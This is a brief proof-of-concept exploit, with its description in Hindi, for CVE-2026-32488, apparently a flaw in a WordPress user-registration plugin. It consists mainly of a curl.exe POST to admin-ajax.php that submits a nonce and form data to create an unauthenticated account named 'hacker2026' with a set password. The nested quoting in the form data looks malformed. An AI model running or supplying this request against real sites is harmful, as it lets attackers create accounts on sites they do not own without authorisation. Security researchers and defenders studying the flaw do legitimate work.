
CVE-2026-32488 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो admin-ajax.php पर तैयार किए गए POST अनुरोधों के माध्यम से WordPress उपयोगकर्ता पंजीकरण को लक्षित करता है, जिससे बिना प्रमाणीकरण के उपयोगकर्ता निर्माण संभव हो पाता है।
CVE-2026-32488
$NONCE = "c82a4f80ba"
curl.exe -s -X POST "http://localhost/wp-admin/admin-ajax.php" -d "action=user_registration_user_form_submit"
-d "ur_frontend_form_nonce=$NONCE" -d "form_id=6"
-d "form_data=[{"field_name":"user_login","value":"hacker2026","field_type":"text"},{"field_name":"user_email","value":"[email protected]","field_type":"email"},{"field_name":"user_pass","value":"Hacker123!","field_type":"password"}]"